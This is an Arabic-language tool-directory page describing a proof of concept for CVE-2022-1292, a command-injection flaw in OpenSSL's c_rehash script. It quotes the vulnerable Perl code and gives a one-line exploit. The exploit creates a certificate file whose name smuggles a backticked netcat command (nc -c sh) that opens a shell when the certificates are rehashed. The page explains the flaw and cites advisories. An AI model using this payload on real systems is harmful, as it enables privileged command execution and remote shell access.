Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/greek0x0/cve-2022-1292
تحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubgreek0x0/cve-2022-1292

CVE-2022-1292

OpenSSL

عرض المستودع
62منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-1292 POC

POC Screenshot

الوصف

root@kitploit:~
لا يقوم script c_rehash بتعقيم محارف الصدفة (shell metacharacters) بشكل صحيح لمنع حقن الأوامر.
يتم توزيع هذا السكريبت من قبل بعض أنظمة التشغيل بطريقة يتم فيها تنفيذه تلقائيًا.
على هذه الأنظمة، يمكن للمهاجم تنفيذ أوامر عشوائية بصلاحيات السكريبت.
يعتبر استخدام السكريبت c_rehash قديمًا ويجب استبداله بأداة سطر الأوامر rehash من OpenSSL.

يتم تنفيذ هذا السكريبت بواسطة update-ca-certificates، من
ca-certificates، لإعادة ترتيب الشهادات في /etc/ssl/certs/. يمكن للمهاجم القادر على
وضع ملفات في هذا الدليل تنفيذ أوامر عشوائية بصلاحيات
السكريبت.

يحدث حقن الأوامر لأن أسماء الملفات لا يتم تعقيمها بشكل صحيح:

  • $fname =~ s/'/'\\''/g;
  • my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`;

هذا الجزء من السكريبت قابل للاستغلال، حيث أن إغلاق الـ backticks يتيح تنفيذ الأوامر، على سبيل المثال ملف باسم: MyCert.crt`whoami` سيقوم بتشغيل "whoami".

إثبات المفهوم (POC)

  1. انتقل إلى /etc/ssl/certs/ (الافتراضي) أو المسارات الأخرى المكوّنة في update-ca-certificates
  2. echo "-----BEGIN CERTIFICATE-----" > "hey.crt\`nc -c sh 127.0.0.1 12345\`" (nc كمثال للحمولة)
  3. ثم انتظر حتى تنفيذ update-ca-certificates. يمكنك تشغيله يدويًا باستخدام c_rehash .

المراجع

  • https://www.cvedetails.com/cve/CVE-2022-1292/
  • https://www.debian.org/security/2022/dsa-5139
  • https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html
  • https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2
  • https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23
  • https://www.openssl.org/news/secadv/20220503.txt
تنزيل الأداة